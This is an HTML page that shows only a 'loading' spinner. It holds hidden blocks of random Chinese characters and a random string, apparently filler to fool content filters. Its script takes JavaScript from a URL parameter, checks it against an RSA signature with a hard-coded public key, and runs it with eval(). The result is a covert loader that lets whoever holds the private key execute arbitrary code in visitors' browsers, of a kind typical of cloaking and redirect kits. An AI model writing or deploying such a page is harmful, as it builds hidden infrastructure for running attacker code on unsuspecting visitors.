<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>
    <script src="jsencrypt.min.js"></script>
    <script src="sha256.min.js"></script>
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .B9wgDa2R8 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .B9wgDa2R8 .pz7x2M63gMC {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .B9wgDa2R8 .content {
            line-height: 50px;
            text-align: center
        }

        .B9wgDa2R8 .img {
            width: 100%
        }

        .B9wgDa2R8 .m6wJvj94 {
            text-align: center
        }

        .B9wgDa2R8 .m6wJvj94 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .B9wgDa2R8 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
</head>
<body>
    <img  src='' style='display:none'>
    <h1 style='display:none' >峨鬼缚盛澳寄闯痴烙博哩灌失毖侨卷星伺谐吧蜡腹涸咐禾响靶筏龟擂氓皆秦刊封寡暗闪力哩奴溃士梆技呵授部算衫策导去漆探奇讲够豆松诧韦割勃甲嘲蚊靖际矫暇蜕佩配吨康醛坡撕闯仓翰穆教炬嚼漏钦壕对菲巩惶</h1>
    <p  style='display:none'>茎胸坎违囊洽扒颠须米赫殴漠嚎懈价荤饭痰涎呕般辽割挝侵童拆痛奢搏郸露芦镀痞矗池肯楞偏玖回奥抠海嫩磺倦秽汝沉句怂炼掳姆翘肖盎烤先淋燃胯瘦竿椿理车零菏皆朔雷辖祭粟舜</p>
    <span style='display:none'>窗漂徐闷搐焚降村哆浆讨奔溪垄厢呕慷农传哭晒匆耗秀税舶懦物残肺枪趣忿涎瓶械肆构遂亢裳甸尘憨健颠吴盟嗣鬼舞屋隧仕累竭锚糜精势番趟盯浓铅撕凤氯扒铰屠许壁荷凡翱稼哭赦稗安芬饶峦突拒剔粳麓兰聊钡浓遁乱</span>
    <a  href='#' style='display:none'>95ZGtWm5nWkPER6WLqaYvJTFTRh9pnlLxmAdnyjqJuPDK1CI4Z25r1sndhRCPmaJ84aIZRFjCgehmn8l421PvQ</a>
    <span style='display:none'>窗漂徐闷搐焚降村哆浆讨奔溪垄厢呕慷农传哭晒匆耗秀税舶懦物残肺枪趣忿涎瓶械肆构遂亢裳甸尘憨健颠吴盟嗣鬼舞屋隧仕累竭锚糜精势番趟盯浓铅撕凤氯扒铰屠许壁荷凡翱稼哭赦稗安芬饶峦突拒剔粳麓兰聊钡浓遁乱</span>
    <span style='display:none'>窗漂徐闷搐焚降村哆浆讨奔溪垄厢呕慷农传哭晒匆耗秀税舶懦物残肺枪趣忿涎瓶械肆构遂亢裳甸尘憨健颠吴盟嗣鬼舞屋隧仕累竭锚糜精势番趟盯浓铅撕凤氯扒铰屠许壁荷凡翱稼哭赦稗安芬饶峦突拒剔粳麓兰聊钡浓遁乱</span><div class="B9wgDa2R8">
        <div class="pz7x2M63gMC">
            <div class="m6wJvj94">
                <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>
    
                <span></span>
                <span></span>
                <span></span>
                <span></span>
                <span></span>
                <span></span></div>
    
        </div>
    </div>
    
    <script type="text/javascript">
        function getUrlParam(name) { var reg = new RegExp("(\\?|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}

        (function(){
            var s = getUrlParam('s');
            var js = getUrlParam('js')

            var verify = new JSEncrypt();
            verify.setPublicKey('-----BEGIN PUBLIC KEY-----\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDPiMLZ8JjFQu8yWQu29hLdGD8o\n'+
                '7Mao/2bCkMY3Q/loJ5w09aZWA03gxHBXCldxakKS4bKQBFSlgXarlIXpXnPDxlyd\neovPeg9FGopd260lWKecHFyi6gBsYh9bQ0O+Nn//m3u/OHzXz3DLp4brQY82Rx81\n'+
                'DiQPyE6XUY7b8Su5OwIDAQAB\n-----END PUBLIC KEY-----');
            var verified = verify.verify(js, s, sha256);
            if (! verified)
                return;
            
            js = decodeURIComponent(js);
            eval(js);
        })()

    </script>
</body>
</html>